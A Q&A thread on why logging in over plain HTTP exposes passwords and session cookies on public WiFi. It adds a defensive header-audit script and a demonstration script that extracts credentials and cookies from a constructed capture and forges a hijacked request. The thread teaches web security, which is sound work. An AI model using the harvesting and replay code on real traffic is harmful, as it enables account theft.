Logins with only HTTP - are they as insecure as I'm thinking?

Recently I was thinking about how websites like Gmail and Amazon use HTTPS during the login process when accessing your account. This makes sense, obviously, since you're typing in your account username and password and you would want that to be secure. However, on Facebook, among countless other websites, their logins are done with simple HTTP. Doesn't that mean that my login name and password are completely unencrypted? Which, even worse, means that all those people who log in to their Facebook accounts (or similar sites) at a WiFi hotspot in public are susceptible to anyone getting their credentials using a simple packet sniffer (or something similar)? Is it really that easy? Or am I misunderstanding internet security?

I'm a software engineer working on some web related stuff, and although at the current time I'm not too involved with the security aspect of our software, I knew I should probably know the answer to this question, since it's extremely fundamental to website security.

Thanks!


Yes. Anything done over open WiFi using HTTP is completely open to interception, replay, etc.

That said, sites that use HTTPS to negotiate login yet exchange the resulting authentication cookie over HTTP are very open to session hijacking as well, as the developer of Firesheep showed.

If you want decent security, do everything under cover of HTTPS. Servers are now fast enough and SSL certificates cheap enough (if you shop around) that this is practical; there's no longer any excuse for web developers so endangering their users.
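A concrete way to check the "do everything under HTTPS" advice on the server side, as an added example (this is not code from the thread or from any site it mentions): the two response header sets below are constructed by hand. The first hands the session cookie back without the Secure attribute, so the browser will happily resend it on the next plain http:// request; the second marks the cookie Secure and adds Strict-Transport-Security so the browser never goes back to HTTP for that host at all.

```python
"""Audit a response for the two things that keep a session on HTTPS.

Added example, not from the original thread. The header sets are constructed:
WEAK_RESPONSE leaks the session cookie back onto plain HTTP, HARDENED_RESPONSE
keeps it on TLS. Only the Secure attribute and HSTS are checked here.
"""

# Constructed sample responses as (header name, value) pairs.
WEAK_RESPONSE = [
    ("Content-Type", "text/html"),
    ("Set-Cookie", "sid=9f8e7d6c5b4a; Path=/"),
]
HARDENED_RESPONSE = [
    ("Content-Type", "text/html"),
    ("Set-Cookie", "sid=9f8e7d6c5b4a; Path=/; Secure; HttpOnly; SameSite=Lax"),
    ("Strict-Transport-Security", "max-age=31536000; includeSubDomains"),
]


def directives(value: str) -> dict[str, str]:
    """Parse a ';'-separated header value into a lower-cased key -> value map.

    Flag-style items such as 'Secure' map to an empty string; the cookie's own
    name=value pair is included under its (lower-cased) name.
    """
    out: dict[str, str] = {}
    for item in value.split(";"):
        key, _, val = item.strip().partition("=")
        if key:
            out[key.strip().lower()] = val.strip()
    return out


def audit_response(headers: list[tuple[str, str]]) -> list[str]:
    """Return findings; an empty list means cookies will only ever travel over TLS."""
    findings: list[str] = []
    hsts_max_age = 0
    for name, value in headers:
        lname = name.lower()
        if lname == "set-cookie":
            cookie_name = value.split(";", 1)[0].partition("=")[0].strip()
            attrs = directives(value)
            if "secure" not in attrs:
                findings.append(
                    f"cookie {cookie_name!r} lacks Secure: the browser will send it over plain HTTP"
                )
        elif lname == "strict-transport-security":
            # max-age=0 is how a site switches HSTS off again, so treat it as absent.
            hsts_max_age = int(directives(value).get("max-age", "0") or 0)
    if hsts_max_age <= 0:
        findings.append(
            "no effective Strict-Transport-Security: a typed or linked http:// URL still starts in the clear"
        )
    return findings


if __name__ == "__main__":
    for label, response in (("weak", WEAK_RESPONSE), ("hardened", HARDENED_RESPONSE)):
        print(label, audit_response(response) or "ok")
```

Note that a cookie without Secure is exposed even if every link on the site is https://, because one http:// bookmark, typed URL or mixed-content image request is enough to make the browser attach it in plaintext; that is exactly the window Firesheep used.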


If you really log in to a site with plain HTTP it's completely insecure, yes, and anyone in a public WLAN could sniff your data. This is why, e.g., Facebook does the actual login via HTTPS (look into the source code of the Facebook start page and you will see it) and then continues without encryption in order to save on computing power. This at least protects your password, but still allows all kinds of other attacks, like session hijacking (they sniff your session cookie and use it themselves).
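To show what "sniff your session cookie and use it themselves" amounts to in practice, here is an added example (not code from either answer, and not what Firesheep itself does internally): it works on a constructed capture of two plaintext requests, the kind a sniffer on open WiFi would reassemble. The first is a login form posted over HTTP, which gives up the password directly; the second is from a site that did log in over HTTPS but then dropped back to HTTP, which gives up the session cookie instead. The last function builds the hijacked request from the stolen cookie; nothing here touches the network.

```python
"""Passive harvesting of credentials and session cookies from plaintext HTTP.

Added example, not code from the original thread. CAPTURE is a constructed
sample of two requests as a sniffer on an open WiFi network would reassemble
them; no packets are read or sent.
"""
from urllib.parse import parse_qs

# Constructed sample capture (raw HTTP/1.1 requests).
CAPTURE = [
    # 1. Login form posted over plain HTTP: the password travels in the clear.
    (b"POST /login HTTP/1.1\r\n"
     b"Host: www.example.test\r\n"
     b"Content-Type: application/x-www-form-urlencoded\r\n"
     b"Content-Length: 39\r\n"
     b"\r\n"
     b"email=alice%40example.test&pass=hunter2"),
    # 2. Later request from a site that logged in over HTTPS but then fell
    #    back to HTTP: the session cookie is exposed instead of the password.
    (b"GET /home HTTP/1.1\r\n"
     b"Host: social.example.test\r\n"
     b"Cookie: sid=9f8e7d6c5b4a; theme=dark\r\n"
     b"\r\n"),
]


def parse_request(raw: bytes) -> tuple[str, str, dict[str, str], bytes]:
    """Split a raw request into (method, path, lower-cased headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers: dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    if "content-length" in headers:  # honour the declared length, drop trailing bytes
        body = body[: int(headers["content-length"])]
    return method, path, headers, body


def harvest(raw: bytes) -> dict:
    """Pull out whatever an eavesdropper can reuse: form fields and cookies."""
    method, path, headers, body = parse_request(raw)
    found = {
        "host": headers.get("host", ""),
        "path": path,
        "credentials": {},  # form fields from a plaintext POST
        "cookies": {},      # cookies the browser attached over plain HTTP
    }
    content_type = headers.get("content-type", "")
    if method == "POST" and content_type.startswith("application/x-www-form-urlencoded"):
        for field, values in parse_qs(body.decode("latin-1")).items():
            found["credentials"][field] = values[0]
    for pair in filter(None, (p.strip() for p in headers.get("cookie", "").split(";"))):
        name, _, value = pair.partition("=")
        found["cookies"][name] = value
    return found


def forge_request(host: str, path: str, cookies: dict[str, str]) -> bytes:
    """Session hijacking: a fresh request that presents the stolen cookies as ours."""
    cookie_header = "; ".join(f"{k}={v}" for k, v in cookies.items())
    return (
        f"GET {path} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        f"Cookie: {cookie_header}\r\n"
        "\r\n"
    ).encode("latin-1")


if __name__ == "__main__":
    for raw in CAPTURE:
        print(harvest(raw))
    stolen = harvest(CAPTURE[1])
    print(forge_request(stolen["host"], "/settings", stolen["cookies"]).decode())
```

The server cannot tell the forged request from the victim's own, which is why the HTTPS-only login in the answer above buys so little on its own: had `sid` been set with the Secure attribute and the whole site served over HTTPS, the browser would never have put it into request 2 in the first place.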